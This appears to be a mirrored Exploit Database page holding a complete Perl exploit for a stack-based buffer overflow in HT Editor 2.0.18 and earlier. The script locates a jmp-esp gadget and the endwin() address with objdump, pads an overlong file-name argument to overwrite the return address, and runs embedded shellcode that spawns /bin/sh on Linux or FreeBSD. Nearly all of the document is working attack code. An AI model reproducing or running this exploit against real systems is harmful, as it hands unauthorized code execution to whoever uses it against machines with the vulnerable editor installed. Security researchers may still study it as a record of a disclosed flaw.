HT Editor 2.0.18 – File Opening Stack Overflow

• Exploit Database
• 15 阅读

• 作者： ZadYree
  日期： 2011-03-30
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/17083/

• # Exploit Title: HT Editor File openning Stack Overflow (0day)
  # Date: March 30th 2011
  # Author: ZadYree
  # Software Link: http://hte.sourceforge.net/downloads.html
  # Version: <= 2.0.18
  # Tested on: Linux/Windows (buffer padding may differ on W32)
  # CVE : None
  #!/usr/bin/perl
  =head1 TITLE
  
  HT Editor <=2.0.18 0day Stack-Based Overflow Exploit
  
  
  =head1 DESCRIPTION
  
  The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip.
  
  
  =head2 AUTHOR
  
  ZadYree ~ 3LRVS Team
  
  
  =head3 SEE ALSO
  
  ZadYree's blog: z4d.tuxfamily.org
  
  3LRVS blog: 3lrvs.tuxfamily.org
  
  Shellcodes based on
  http://www.shell-storm.org/shellcode/files/shellcode-606.php
  http://www.shell-storm.org/shellcode/files/shellcode-171.php
  
  => Thanks 
  =cut
  use 5.010;
  
  my ($esp, $retaddr);
  my $scz = 	[	"\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e" .
  				"\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" .
  				"\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" .
  				"\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" .
  				"\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" .
  				"\x53\x52\x54\x8a\xe2\xce\x81",
  				"\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b" .
  				"\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53" .
  				"\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff" .
  				"/bin/sh"	];
  
  say'[*]Looking for $esp and endwin()...';
  
  my $namez = [qw#/usr/bin/hte /usr/local/bin/ht#];
  
  my $infos = get_infos(qx{uname});
  
  my $name = $infos->[0];
  
  
  say '[+]endwin() address found! (0x', $infos->[3],')';
  
  for my $line(qx{objdump -D $name | grep "ff e4"}) {
  	$esp = "0" . $1, last if ($line =~ m{([a-f0-9]{7}).+jmp\s{4}\*%esp});
  }
  
  say '[+]$esp place found! (0x', $esp, ")\012Now exploiting...";
  
  my @payload = ($infos->[0], ("A" x ($infos->[1] - length(qx{pwd}))) . reverse(pack('H*', $infos->[3])) . reverse(pack('H*', $esp)) . $infos->[2]);
  exec(@payload);
  
  
  sub get_infos {
  	given(shift) {
  		when(/Linux/) {
  			return([$namez->[0], 4108, $scz->[0], getendwin("linux")]);
  		}
  		when(/FreeBSD/) {
  			return([$namez->[1], 271, $scz->[1], getendwin("freebsd")]);
  		}
  		#Possibility to add friends ^^
  	}
  }
  
  sub getendwin {
  	given(shift) {
  		when("linux") {
  			my $n = $namez->[0];
  			for (qx{objdump -d $n | grep endwin}) {
  				$retaddr = $1, last if ($_ =~ m{(.*) <});
  			}
  			return($retaddr);
  		}
  		when("freebsd") {
  			return("282c2990");
  		}
  	}
  }